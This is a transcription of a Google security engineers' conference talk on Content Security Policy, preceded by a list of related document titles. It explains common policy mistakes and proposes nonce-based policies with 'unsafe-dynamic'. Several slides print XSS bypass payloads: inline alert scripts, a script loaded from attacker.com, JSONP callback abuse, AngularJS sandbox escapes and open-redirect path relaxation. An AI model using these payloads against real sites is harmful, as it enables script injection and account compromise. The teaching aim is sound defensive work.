CSP ODDITIES. Michele Spagnuolo Lukas Weichselbaum

Similar documents
Defense-in-depth techniques. for modern web applications

So we broke all CSPs. You won't guess what happened next!

Content Security Policy

BOOSTING THE SECURITY

BOOSTING THE SECURITY OF YOUR ANGULAR 2 APPLICATION

Content Security Policy

HTTP Security Headers Explained

Browser code isolation

CSE361 Web Security. Attacks against the client-side of web applications. Nick Nikiforakis

Match the attack to its description:

Extending the browser to secure applications

Know Your Own Risks: Content Security Policy Report Aggregation and Analysis

Northeastern University Systems Security Lab

High -Tech Bridge s Web Server Security Service API Developer Documentation Version v1.3 February 13 th 2018

Writing Secure Chrome Apps and Extensions

Modern client-side defenses. Deian Stefan

Origin Policy Enforcement in Modern Browsers

last time: command injection

We will show you how we bypassed every XSS mitigation we tested. Mitigation bypass-ability via script gadget chains in 16 popular libraries

Abusing JSONP with. Michele - CVE , CVE Pwnie Awards 2014 Nominated

Web Security IV: Cross-Site Attacks

AN EVALUATION OF THE GOOGLE CHROME EXTENSION SECURITY ARCHITECTURE

Web Security: Vulnerabilities & Attacks

RKN 2015 Application Layer Short Summary

CSE361 Web Security. Attacks against the client-side of web applications. Nick Nikiforakis

NoScript, CSP and ABE: When The Browser Is Not Your Enemy

WEB SECURITY: XSS & CSRF

iframe programming with jquery jquery Summit 2011

Code-Reuse Attacks for the Web: Breaking XSS mitigations via Script Gadgets

Care & Feeding of Programmers: Addressing App Sec Gaps using HTTP Headers. Sunny Wear OWASP Tampa Chapter December

CCSP: Controlled Relaxation of Content Security Policies by Runtime Policy Composition

The Evolution of Chrome Security Architecture. Huan Ren Director, Qihoo 360 Technology Ltd

MODERN WEB APPLICATION DEFENSES

Content Security Policy. Vlastimil Zíma 24. listopadu 2017

Web basics: HTTP cookies

Code-Injection Attacks in Browsers Supporting Policies. Elias Athanasopoulos, Vasilis Pappas, and Evangelos P. Markatos FORTH-ICS

How is state managed in HTTP sessions. Web basics: HTTP cookies. Hidden fields (2) The principle. Disadvantage of this approach

Trusted Types - W3C TPAC

Client Side Security And Testing Tools

Ge#ng The Most Out Of CSP: A Deep Dive. Sergey Shekyan

Django-CSP Documentation

Project 3 Web Security Part 1. Outline

Cross-domain leakiness Divulging sensitive information & attacking SSL sessions Chris Evans - Google Billy Rios - Microsoft

Lecture 17 Browser Security. Stephen Checkoway University of Illinois at Chicago CS 487 Fall 2017 Some slides from Bailey's ECE 422

CSC 482/582: Computer Security. Cross-Site Security

Web basics: HTTP cookies

CS 161 Computer Security

CNIT 129S: Securing Web Applications. Ch 12: Attacking Users: Cross-Site Scripting (XSS) Part 2

Web Security: Vulnerabilities & Attacks

Abusing JSONP with Rosetta Flash

CS 161 Computer Security

Penetration Test Report

Abusing JSONP with Rosetta Flash

Web Security II. Slides from M. Hicks, University of Maryland

Protec'ng Java EE Web Apps with Secure HTTP Headers

Client Side Injection on Web Applications

CSE 484 / CSE M 584: Computer Security and Privacy. Web Security. Autumn Tadayoshi (Yoshi) Kohno

Moving your website to HTTPS - HSTS, TLS, HPKP, CSP and friends

Common Websites Security Issues. Ziv Perry

Design Document V2 ThingLink Startup

Cross-Site Scripting (XSS) Professor Larry Heimann Web Application Security Information Systems

Exploiting and Defending: Common Web Application Vulnerabilities

Some Facts Web 2.0/Ajax Security

Practical Clickjacking with BeEF

October 08: Introduction to Web Security

User Input Piercing For Cross-site Scripting Attacks OWASP 11/12/2009. The OWASP Foundation Matias Blanco

Hybrid App Security Attack and Defense

Password Managers: Attacks and Defenses

EasyCrypt passes an independent security audit

WEB SECURITY WORKSHOP TEXSAW Presented by Solomon Boyd and Jiayang Wang

ISSA: EXPLOITATION AND SECURITY OF SAAS APPLICATIONS. Waqas Nazir - CEO - DigitSec, Inc.

Using HTTPS - HSTS, TLS, HPKP, CSP and friends

Web 2.0 and AJAX Security. OWASP Montgomery. August 21 st, 2007

W3Conf, November 15 & 16, Brad Scott

Security in a Mainframe Emulator. Chaining Security Vulnerabilities Until Disaster Strikes (twice) Author Tim Thurlings & Meiyer Goren

Avoiding Web Application Flaws In Embedded Devices. Jake Edge LWN.net URL for slides:

HTML5 Unbound: A Security & Privacy Drama. Mike Shema Qualys

Application Security through a Hacker s Eyes James Walden Northern Kentucky University

Chat with a hacker. Increase attack surface for Pentest. A talk by Egor Karbutov and Alexey Pertsev

CNIT 129S: Securing Web Applications. Ch 10: Attacking Back-End Components

Robust Defenses for Cross-Site Request Forgery

Computer Security 3e. Dieter Gollmann. Chapter 18: 1

Introduction into browser hacking. Andrey Kovalev

2/16/18. CYSE 411/AIT 681 Secure Software Engineering. Secure Coding. The Web. Topic #11. Web Security. Instructor: Dr. Kun Sun

Analysis of Hypertext Isolation Techniques for Cross-site Scripting Prevention. Mike Ter Louw Prithvi Bisht V.N. Venkatakrishnan

Jquery.ajax Call Returns Status Code Of 200 But Fires Jquery Error

For Bitcoins and Bounties James Kettle

AJAX: From the Client-side with JavaScript, Back to the Server

Evaluating the Security Risks of Static vs. Dynamic Websites

Jquery Manually Set Checkbox Checked Or Not

Website Report for

5/19/2015. Objectives. JavaScript, Sixth Edition. Saving State Information with Query Strings. Understanding State Information

Web Security. Aggelos Kiayias Justin Neumann

Security. CSC309 TA: Sukwon Oh

ThingLink User Guide. Andy Chen Eric Ouyang Giovanni Tenorio Ashton Yon

Browser Based Defenses

Attacking the Application OWASP. The OWASP Foundation. Dave Ferguson, CISSP Security Consultant FishNet Security.

Saumil Shah. net-square DEEPS E C

More attacks on clients: Click-jacking/UI redressing, CSRF

Website Report for colourways.com.au

Transcription:

ODDITIES Michele Spagnuolo Lukas Weichselbaum

ABOUT US Michele Spagnuolo Lukas Weichselbaum Information Security Engineer Information Security Engineer We work in a special focus area of the Google security team aimed at improving product security by targeted proactive projects to mitigate whole classes of bugs.

CONTENT What we ll be talking about 01 WHAT IS 05 A NEW WAY OF DOING 02 WHAT S IN A POLICY? 06 THE FUTURE OF 03 COMMON MISTAKES 07 SUCCESS STORIES 04 BYPASSING 08 Q&A

SO WHAT IS? A tool developers can use to lock down their web applications in various ways. is a defense-in-depth mechanism - it reduces the harm that a malicious injection can cause, but it is not a replacement for careful input validation and output encoding.

2 specification: https://www.w3.org/tr// GOALS OF 3 draft: https://w3c.github.io/webappsec-csp/ It s pretty ambitious... Granular control over resources that can be requested, embedded and executed, execution of inline scripts, dynamic code execution (eval) and application of inline style. Sandbox not just iframes, but any resource, framed or not. The content is forced into a unique origin, preventing it from running scripts or plugins, submitting forms, etc... Find out when your application gets exploited, or behaves differently from how you think it should behave. By collecting violation reports, an administrator can be alerted and easily spot the bug. MITIGATE REDUCE PRIVILEGE DETECT EXPLOITATION risk of the application by monitoring violations 5

WHAT S IN A POLICY? It s a HTTP header. directives Many, for many different problems. Actually, two. Content-Security-Policy: enforcing mode Content-Security-Policy-Report-Only: report-only mode base-uri default-src connect-src img-src font-src child-src script-src media-src frame-ancestors style-src object-src plugin-types report-uri We ll focus on script-src. 6

HOW DOES IT WORK? A policy in detail Content-Security-Policy: money.example.com allows money.example.com allows yep.com <img src="cat.png"> <script src="//yep. com/x.js"> default-src 'self'; script-src 'self' yep.com; report-uri /csp_violation_logger; 7

HOW DOES IT WORK? Script injections (XSS) get blocked Content-Security-Policy money.example.com allows money.example.com allows yep.com <img src="cat.png"> <script src="//yep. com/x.js"> ">'><script src=" //attacker.com"> ">'><script>alert(42) </script> default-src 'self'; script-src 'self' yep.com; report-uri /csp_violation_logger; attacker.com blocks source not whitelisted blocks inline script not allowed DEMO money.example.com/csp_violations_logger 8

BUT... IT'S HARD TO DEPLOY Two examples from Twitter and GMail Policies get less secure the longer they are. These are not strict... they allow 'unsafe-inline' (and 'unsafe-eval'). Even if they removed 'unsafe-inline' (or added a nonce), any JSONP endpoint on whitelisted domains/paths can be the nail in their coffin. In practice, in a lot of real-world complex applications is just used for monitoring purposes, not as a defense-in-depth against XSS. 9

COMMON MISTAKES [1/4] Trivial mistakes 'unsafe-inline' in script-src (and no nonce) script-src 'self' 'unsafe-inline' ; object-src 'none'; Same for default-src, if there's no script-src directive. Bypass ">'><script>alert(1337)</script> 10

COMMON MISTAKES [2/4] Trivial mistakes URL schemes or wildcard in script-src (and no 'unsafe-dynamic') script-src 'self' https: data: * ; object-src 'none'; Same for URL schemes and wildcards in object-src. Bypasses ">'><script src=https://attacker.com/evil.js></script> ">'><script src=data:text/javascript,alert(1337)></script> 11

COMMON MISTAKES [3/4] Less trivial mistakes Missing object-src or default-src directive script-src 'self'; It looks secure, right? Bypass ">'><object type="application/x-shockwave-flash" data='https: //ajax.googleapis.com/ajax/libs/yui/2.8.0 r4/build/charts/assets/charts.swf?alloweddomain=\"})))}catch(e) {alert(1337)}//'> <param name="allowscriptaccess" value="always"></object> 12

COMMON MISTAKES [4/4] Less trivial mistakes Allow 'self' + hosting user-provided content on the same origin script-src 'self'; object-src 'none'; Same for object-src. Bypass ">'><script src="/user_upload/evil_cat.jpg.js"></script> 13

BYPASSING [1/5] Whitelist bypasses JSONP-like endpoint in whitelist script-src 'self' https://whitelisted.com ; object-src 'none'; Bypass ">'><script src="https://whitelisted.com/jsonp?callback=alert"> 14

BYPASSING [2/5] DEMO JSONP is a problem bypassable.com ">'><script src="https: //whitelisted.com/jsonp? callback=alert(1);u"> A SOME* attack ">'><script src="https: //whitelisted.com/jsonp? callback=x.click"> allows alert(1);u({...}) allows x.click({...}) * 1) You whitelist an origin/path hosting a JSONP endpoint. 2) Javascript execution is allowed, extent is depending on how liberal the JSONP endpoint is and what a user can control Same Origin Method Execution Don't whitelist JSONP endpoints. Sadly, there are a lot of those out there....especially on CDNs! (just the callback function or also parameters). 15

BYPASSING [3/5] Whitelist bypasses AngularJS library in whitelist script-src 'self' https://whitelisted.com ; object-src 'none'; Bypass "><script src="https://whitelisted.com/angular.min.js"></script> <div ng-app ng-csp>{{1336 + 1}}</div> "><script src="https://whitelisted.com/angularjs/1.1.3/angular.min.js"> </script> <div ng-app ng-csp id=p ng-click=$event.view.alert(1337)> Also works without user interaction, e.g. by combining with JSONP endpoints or other JS libraries. 16

BYPASSING [4/5] AngularJS is a problem bypassable.com ng-app ng-csp ng-click=$event.view.alert(1337)> <script src="//whitelisted.com/angular.js"></script> ng-app ng-csp> <script src="//whitelisted.com/angular.js"></script> <script src="//whitelisted.com/prototype.js"> </script>{{$on.curry.call().alert(1)}} allows allows Sandbox bypass in AngularJS Outdated Angular + outdated Prototype.js giving access to window Powerful JS frameworks are a problem 1) 2) You whitelist an origin/path hosting a version of AngularJS with known sandbox bypasses. Or you combine it with outdated Prototype.js. Or JSONP endpoints. The attacker can exploit those to achieve full XSS. Don't use in combination with CDNs hosting AngularJS. For more bypasses in popular CDNs, see Cure53's minichallenge. 17

BYPASSING [5/5] Path relaxation Path relaxation due to open redirect in whitelist script-src https://whitelisted.com/totally/secure.js https://site.with.redirect.com; object-src 'none'; Bypass Path is ignored after redirect! ">'><script src="https://whitelisted.com/jsonp?callback=alert"> ">'><script src="https://site.with.redirect.com/redirect?url=https%3a//whitelisted.com/jsonp%2fcallback%3dalert"> Spec: "To avoid leaking path information cross-origin (as discussed in Homakov s Using Content-Security-Policy for Evil), the matching algorithm ignores path component of a source expression if the resource loaded is the result of a redirect." money.example.com <script src="https://site.with. redirect.com/ redirect?url=https%3a//whitelisted. com/jsonp%2fcallback%3dalert" ></script> allows site.with.redirect.com allows whitelisted.com Path is ignored after redirect! 18

EVALUATOR "A Tool to Rule Them All" 19

Findings 20

A NEW WAY OF DOING Strict nonce-based Strict nonce-based policy script-src 'nonce-r4nd0m'; object-src 'none'; All <script> tags with the correct nonce attribute will get executed <script> tags injected via XSS will be blocked, because of missing nonce No host/path whitelists! No bypasses because of JSONP-like endpoints on external domains (administrators no longer carry the burden of external things they can't control) No need to go through the painful process of crafting and maintaining a whitelist Problem Dynamically created scripts <script nonce="r4nd0m"> var s = document.createelement("script"); s.src = "//example.com/bar.js"; document.body.appendchild(s); </script> bar.js will not be executed Common pattern in libraries Hard to refactor libraries to pass nonces to second (and more)-level scripts 21

HOW DO NONCES WORK? A policy in detail Content-Security-Policy: money.example.com allows money.example.com allows yep.com <img src="cat.png"> <script nonce="r4nd0m" src="//yep.com/x.js"> default-src 'self'; script-src 'self' 'nonce-r4nd0m'; report-uri /csp_violation_logger; 22

HOW DO NONCES WORK? Script injections (XSS) get blocked Content-Security-Policy money.example.com allows money.example.com allows yep.com <img src="cat.png"> <script nonce="r4nd0m" src="//yep.com/x.js"> ">'><script src=" //attacker.com"> ">'><script>alert(42) </script> default-src 'self'; script-src 'self' 'nonce-r4nd0m'; report-uri /csp_violation_logger; attacker.com blocks source neither nonced nor whitelisted blocks script without correct nonce DEMO money.example.com/csp_violations_logger 23

THE SOLUTION Dynamic trust propagation with 'unsafe-dynamic' <script nonce="r4nd0m"> var s = document.createelement("script"); s.src = "//example.com/bar.js"; document.body.appendchild(s); EFFECTS OF 'unsafe-dynamic' From the 3 specification directive, together with a nonce and/or The 'unsafe-dynamic' source expression </script> If present in a script-src or default-src hashes, it has two main effects: aims to make Content Security Policy <script nonce="r4nd0m"> var s = "<script "; s += "src=//example.com/bar.js></script>"; document.write(s); </script> Parser inserted simpler to deploy for existing 1) applications which have a high degree of inline', if nonces are present in confidence in the scripts they load the policy) directly, but low confidence in the possibility to provide a secure whitelist. 2) <script nonce="r4nd0m"> var s = "<script "; s += "src=//example.com/bar.js></script>"; document.body.innerhtml = s; </script> Parser inserted Discard whitelists (and 'unsafe- Scripts created by non-parserinserted (dynamically generated) script elements are allowed.

A NEW WAY OF DOING Introducing strict nonce-based with 'unsafe-dynamic' Strict nonce-based with 'unsafe-dynamic' and fallbacks for older browsers script-src 'nonce-r4nd0m' 'unsafe-dynamic' 'unsafe-inline' https:; object-src 'none'; Behavior in a 3 compatible browser nonce-r4nd0m - Allows all scripts to execute if the correct nonce is set. unsafe-dynamic - [NEW!] Propagates trust and discards whitelists. unsafe-inline - Discarded in presence of a nonce in newer browsers. Here to make script-src a no-op for old browsers. https: - Allow HTTPS scripts. Discarded if browser supports 'unsafe-dynamic'. DEMO 25

A NEW WAY OF DOING Strict nonce-based with 'unsafe-dynamic' and older browsers script-src 'nonce-r4nd0m' 'unsafe-dynamic' 'unsafe-inline' https:; object-src 'none'; Dropped by 2 and above in presence of a nonce Dropped by 3 in presence of 'unsafe-dynamic' Behavior in 3 compatible browser 3 compatible browser (unsafe-dynamic support) script-src 'nonce-r4nd0m' 'unsafe-dynamic' 'unsafe-inline' https:; object-src 'none'; Behavior in 3 compatible browser 2 compatible browser (nonce support) - No-op fallback script-src 'nonce-r4nd0m' 'unsafe-dynamic' 'unsafe-inline' https:; object-src 'none'; Behavior in 3 compatible browser 1 compatible browser (no nonce support) - No-op fallback script-src 'nonce-r4nd0m' 'unsafe-dynamic' 'unsafe-inline' https:; object-src 'none'; 26

BROWSER SUPPORT A fragmented environment 'unsafe-dynamic' support :) THE GOOD, THE OK, THE UGLY Chromium / Chrome is the browser with the best support of, even if it does not always follow the spec (with reasons). Firefox did not support child-src and delivery of via <meta> tag until March 2016 (version 45), still does not implement plugin-types and struggles with SharedWorkers. Nonce support Webkit-based browsers (Safari,...) very recently got nonce support. :( Microsoft Edge still fails several tests. Internet Explorer just supports the "sandbox" attribute. 27

SUCCESS STORIES 'unsafe-dynamic' makes easier to deploy and more secure Already deployed on several Google services, totaling 7M+ monthly active users. Works out of the box for: Google Maps APIs Google Charts APIs Facebook widget Twitter widget ReCAPTCHA... Test it yourself with Chrome 52+: https://csp-experiments.appspot.com/unsafe-dynamic 28

Q&A We would love to get your feedback! QUESTIONS? @mikispag @we1x #unsafedynamic {lwe,mikispag}@google.com 29

2024 © technodocbox.com Privacy Policy | Terms of Service | Feedback